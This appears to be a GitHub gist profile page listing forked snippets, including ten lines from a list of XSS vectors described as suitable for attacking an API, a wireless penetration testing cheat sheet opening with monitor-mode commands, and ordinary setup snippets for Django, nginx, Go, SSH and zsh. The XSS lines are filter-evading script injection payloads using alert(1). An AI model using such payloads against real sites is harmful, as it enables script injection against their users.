Skip to content

Instantly share code, notes, and snippets.

Avatar

Kanin Peanviriyakulkit dogrocker

  • @LAMUNPUN IT
  • Thailand
View GitHub Profile
@dogrocker
dogrocker / 666_lines_of_XSS_vectors.html
Created Nov 27, 2017 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
View 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@dogrocker
dogrocker / messages_and_errors_django_template.html
Created Jul 7, 2017 — forked from adamghill/messages_and_errors_django_template.html
Show messages and errors in Django templates. Useful to just throw in a base template.
View messages_and_errors_django_template.html
{% if messages %}
{% for message in messages %}
<div class="alert {% if message.tags %} alert-{{ message.tags }}{% endif %}">{{ message|safe }}</div>
{% endfor %}
{% endif %}
{% if form.errors %}
<div class="alert alert-error">
<h4>Please fix the following errors</h4>
<ul>
@dogrocker
dogrocker / nginx.conf
Created Jun 13, 2017 — forked from plentz/nginx.conf
Best nginx configuration for improved security(and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
View nginx.conf
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
@dogrocker
dogrocker / .bashrc
Created Jul 21, 2016 — forked from vsouza/.bashrc
Golang 1.5 setup in Mac OSX with HomeBrew. Set `GOPATH` and `GOROOT` variables in zshell or bash.
View .bashrc
# Set variables in .bashrc file
# don't forget to change your path correctly!
export GOPATH=$HOME/golang
export GOROOT=/usr/local/opt/go/libexec
export PATH=$PATH:$GOPATH/bin
export PATH=$PATH:$GOROOT/bin
@dogrocker
dogrocker / multiple_ssh_setting.md
Created Jul 3, 2016 — forked from jexchan/multiple_ssh_setting.md
Multiple SSH keys for different github accounts
View multiple_ssh_setting.md

Multiple SSH Keys settings for different github account

create different public key

create different ssh key according the article Mac Set-Up Git

$ ssh-keygen -t rsa -C "your_email@youremail.com"
@dogrocker
dogrocker / Wireless Penetration Testing Cheat Sheet.md
Created Jul 2, 2016
Wireless Penetration Testing Cheat Sheet
View Wireless Penetration Testing Cheat Sheet.md

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
View Oh my zsh with autosuggestions & syntax-highlighting.md

Oh my zsh.

Install with curl

sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"

Enabling Plugins (zsh-autosuggestions & zsh-syntax-highlighting)

  • Download zsh-autosuggestions by
@dogrocker
dogrocker / README.md
Created Jun 7, 2016 — forked from joyrexus/README.md
Form/file uploads with hapi.js
View README.md

Demo of multipart form/file uploading with hapi.js.

Usage

npm install
npm run setup
npm run server

Then ...

@dogrocker
dogrocker / Yii2 clone table prefix function in to javascript.md
Last active Apr 21, 2016
Returns the actual name of a given table name.
View Yii2 clone table prefix function in to javascript.md

This method will strip off curly brackets from the given table name

and replace the percentage character '%' with [[tablePrefix]].

let re = /{{(.*?)}}/g
let str = 'SELECT * FROM {{%user}} FROM WHERE id IN (?)'
let tablePrefix = 'tbl_'
console.log(str.replace(re, '$1').replace('%', tablePrefix))
@dogrocker
dogrocker / API.md
Created Jan 11, 2016 — forked from iros/API.md
Documenting your REST API
View API.md

Title

<Additional information about your API call. Try to use verbs that match both request type (fetching vs modifying) and plurality (one vs multiple).>

  • URL

    <The URL Structure (path only, no root url)>

  • Method:

You can’t perform that action at this time.